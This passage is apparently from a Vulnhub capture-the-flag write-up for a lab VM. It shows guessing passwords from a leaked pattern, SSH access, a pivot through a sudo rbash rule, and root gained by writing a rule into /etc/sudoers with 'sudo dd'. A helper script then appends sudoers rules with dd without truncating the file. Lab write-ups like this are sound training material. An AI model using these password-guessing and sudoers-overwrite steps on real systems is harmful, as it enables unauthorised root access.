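# Turn a list of usernames (stdin) into "user:candidate" pairs using the
# pattern observed in the leaked DB password.
password_candidates() {
    while IFS= read -r u; do
        [ -n "$u" ] && printf '%s:%s_is_my_password\n' "$u" "$u"
    done
}

# Demonstration on the constructed sample: prints ck-00, bla1 and bla with
# their candidates.
printf '%s\n' "$PASSWD_SAMPLE" | login_users | password_candidates
```

On the real target the candidates would be fed to `su` or `ssh` one at a time; the account list is also worth reading for oddities such as ck-00's home directory being /home/ck rather than /home/ck-00.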

┌──(kali㉿kali)-[~/Vulnhub/Backrose]
└─$ ssh bla1@192.168.56.156            
The authenticity of host '192.168.56.156 (192.168.56.156)' can't be established.
ED25519 key fingerprint is SHA256:S/Y0+W7GZ+wOi281WhP7Ra++AOCa3hRWjLJYofjlOeA.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.156' (ED25519) to the list of known hosts.
bla1@192.168.56.156's password: 
Permission denied, please try again.
bla1@192.168.56.156's password: 
Last login: Fri Aug  2 13:23:25 2019 from 192.168.29.240
bla1@ck00:~$ id
uid=1001(bla1) gid=1001(bla1) groups=1001(bla1)
bla1@ck00:~$ sudo -l
Matching Defaults entries for bla1 on ck00:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bla1 may run the following commands on ck00:
    (ck-00) NOPASSWD: /bin/rbash
bla1@ck00:~$ sudo -u ck-00 /bin/rbash
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

ck-00@ck00:~$ id
uid=1000(ck-00) gid=1000(ck-00) groups=1000(ck-00),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
ck-00@ck00:~$ ls
ck-00@ck00:~$ cd /home
rbash: cd: restricted
ck-00@ck00:~$ sudo -l
Matching Defaults entries for ck-00 on ck00:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User ck-00 may run the following commands on ck00:
    (root) NOPASSWD: /bin/dd
ck-00@ck00:~$ echo "ck-00 ALL=(ALL) NOPASSWD: ALL" | sudo dd of=/etc/sudoers
0+1 records in
0+1 records out
30 bytes copied, 0.000104292 s, 288 kB/s
ck-00@ck00:~$ sudo su
root@ck00:/home/bla1# id
uid=0(root) gid=0(root) groups=0(root)
root@ck00:/home/bla1# cd /root
root@ck00:~# ls
ck00-root-flag.txt
root@ck00:~# cat ck00-root-flag.txt 
 ▄▄▄▄▄▄▄▄▄▄▄ ▄         ▄ ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄    ▄ ▄▄        ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄         ▄ ▄▄▄▄▄▄▄▄▄▄▄        ▄▄▄▄▄▄▄▄▄   ▄▄▄▄▄▄▄▄▄  
▐░░░░░░░░░░░▐░▌       ▐░▐░░░░░░░░░░▌▐░░░░░░░░░░░▐░░░░░░░░░░░▐░▌  ▐░▐░░▌      ▐░▐░░░░░░░░░░░▐░░░░░░░░░░░▐░▌       ▐░▐░░░░░░░░░░░▌      ▐░░░░░░░░░▌ ▐░░░░░░░░░▌ 
▐░█▀▀▀▀▀▀▀▀▀▐░▌       ▐░▐░█▀▀▀▀▀▀▀█░▐░█▀▀▀▀▀▀▀▀▀▐░█▀▀▀▀▀▀▀█░▐░▌ ▐░▌▐░▌░▌     ▐░▌▀▀▀▀█░█▀▀▀▀▐░█▀▀▀▀▀▀▀▀▀▐░▌       ▐░▌▀▀▀▀█░█▀▀▀▀      ▐░█░█▀▀▀▀▀█░▐░█░█▀▀▀▀▀█░▌
▐░▌         ▐░▌       ▐░▐░▌       ▐░▐░▌         ▐░▌       ▐░▐░▌▐░▌ ▐░▌▐░▌    ▐░▌    ▐░▌    ▐░▌         ▐░▌       ▐░▌    ▐░▌          ▐░▌▐░▌    ▐░▐░▌▐░▌    ▐░▌
▐░▌         ▐░█▄▄▄▄▄▄▄█░▐░█▄▄▄▄▄▄▄█░▐░█▄▄▄▄▄▄▄▄▄▐░█▄▄▄▄▄▄▄█░▐░▌░▌  ▐░▌ ▐░▌   ▐░▌    ▐░▌    ▐░▌ ▄▄▄▄▄▄▄▄▐░█▄▄▄▄▄▄▄█░▌    ▐░▌          ▐░▌ ▐░▌   ▐░▐░▌ ▐░▌   ▐░▌
▐░▌         ▐░░░░░░░░░░░▐░░░░░░░░░░▌▐░░░░░░░░░░░▐░░░░░░░░░░░▐░░▌   ▐░▌  ▐░▌  ▐░▌    ▐░▌    ▐░▌▐░░░░░░░░▐░░░░░░░░░░░▌    ▐░▌          ▐░▌  ▐░▌  ▐░▐░▌  ▐░▌  ▐░▌
▐░▌          ▀▀▀▀█░█▀▀▀▀▐░█▀▀▀▀▀▀▀█░▐░█▀▀▀▀▀▀▀▀▀▐░█▀▀▀▀█░█▀▀▐░▌░▌  ▐░▌   ▐░▌ ▐░▌    ▐░▌    ▐░▌ ▀▀▀▀▀▀█░▐░█▀▀▀▀▀▀▀█░▌    ▐░▌          ▐░▌   ▐░▌ ▐░▐░▌   ▐░▌ ▐░▌
▐░▌              ▐░▌    ▐░▌       ▐░▐░▌         ▐░▌     ▐░▌ ▐░▌▐░▌ ▐░▌    ▐░▌▐░▌    ▐░▌    ▐░▌       ▐░▐░▌       ▐░▌    ▐░▌          ▐░▌    ▐░▌▐░▐░▌    ▐░▌▐░▌
▐░█▄▄▄▄▄▄▄▄▄     ▐░▌    ▐░█▄▄▄▄▄▄▄█░▐░█▄▄▄▄▄▄▄▄▄▐░▌      ▐░▌▐░▌ ▐░▌▐░▌     ▐░▐░▌▄▄▄▄█░█▄▄▄▄▐░█▄▄▄▄▄▄▄█░▐░▌       ▐░▌    ▐░▌          ▐░█▄▄▄▄▄█░█░▐░█▄▄▄▄▄█░█░▌
▐░░░░░░░░░░░▌    ▐░▌    ▐░░░░░░░░░░▌▐░░░░░░░░░░░▐░▌       ▐░▐░▌  ▐░▐░▌      ▐░░▐░░░░░░░░░░░▐░░░░░░░░░░░▐░▌       ▐░▌    ▐░▌           ▐░░░░░░░░░▌ ▐░░░░░░░░░▌ 
 ▀▀▀▀▀▀▀▀▀▀▀      ▀      ▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀ ▀         ▀ ▀    ▀ ▀        ▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀         ▀      ▀             ▀▀▀▀▀▀▀▀▀   ▀▀▀▀▀▀▀▀▀  
                                                                                                                                                              


flag = c0523985a2640ad30429fb2055196e4c

Thia flag is a proof that you get the root shell.

You have to submit your report contaning all steps you take to get root shell.

Send your report to our official mail : vishalbiswas420@gmail.com
root@ck00:~# 
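The last hop above relies on `(root) NOPASSWD: /bin/dd`: piping a single line into `sudo dd of=/etc/sudoers` replaces the whole file with that line (the "30 bytes copied" output is exactly the length of the new rule), after which `sudo su` works because ck-00 now has a passwordless ALL rule. That works on a throwaway VM, but it destroys every other sudoers entry. The script below is an added example, not part of the original write-up, showing the same dd primitive used to append rather than truncate: plain POSIX dd has no `oflag=append`, so it seeks to the current file size with `conv=notrunc`. File paths and the rule text are parameters, and the demo runs on a temporary file instead of the real /etc/sudoers.

```shell
# Added example (not from the original write-up): write a sudoers rule with
# dd without clobbering the existing file. Uses only POSIX dd options.

# Overwrite semantics, as in the write-up: the file ends up containing only
# the new line.
dd_overwrite() {   # dd_overwrite <file> <line>
    printf '%s\n' "$2" | dd of="$1" 2>/dev/null
}

# Append semantics: seek past the existing bytes (bs=1, so seek counts bytes)
# and tell dd not to truncate first.
dd_append() {      # dd_append <file> <line>
    size=$(($(wc -c < "$1")))
    printf '%s\n' "$2" | dd of="$1" bs=1 seek="$size" conv=notrunc 2>/dev/null
}

# Check that the rule is present exactly once as a whole line. On a real host
# also run "visudo -c" before relying on the file, since a broken sudoers
# locks everyone out of sudo.
has_rule_once() {  # has_rule_once <file> <line>
    [ "$(grep -cxF -- "$2" "$1")" -eq 1 ]
}

# Demo on a constructed sudoers-like file (hypothetical contents).
demo() {
    f=$(mktemp)
    printf 'Defaults env_reset\nroot ALL=(ALL:ALL) ALL\n' > "$f"
    rule='ck-00 ALL=(ALL) NOPASSWD: ALL'

    dd_append "$f" "$rule"
    if has_rule_once "$f" "$rule" && grep -qxF 'root ALL=(ALL:ALL) ALL' "$f"; then
        echo "append: rule added, existing entries kept ($(($(wc -l < "$f"))) lines)"
    fi

    dd_overwrite "$f" "$rule"
    if [ $(($(wc -l < "$f"))) -eq 1 ]; then
        echo "overwrite: only the new rule remains (what the write-up did)"
    fi
    rm -f "$f"
}
demo
```

Note that the appended line must start on a fresh line; both functions end the rule with a newline and sudoers files normally end with one, but if the target file does not, prepend a newline to the rule. A quieter use of the same sudo rule would be `sudo dd if=/root/ck00-root-flag.txt`, which reads the flag without modifying anything.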

Posted 2022-11-07 15:44 by Jason_huawen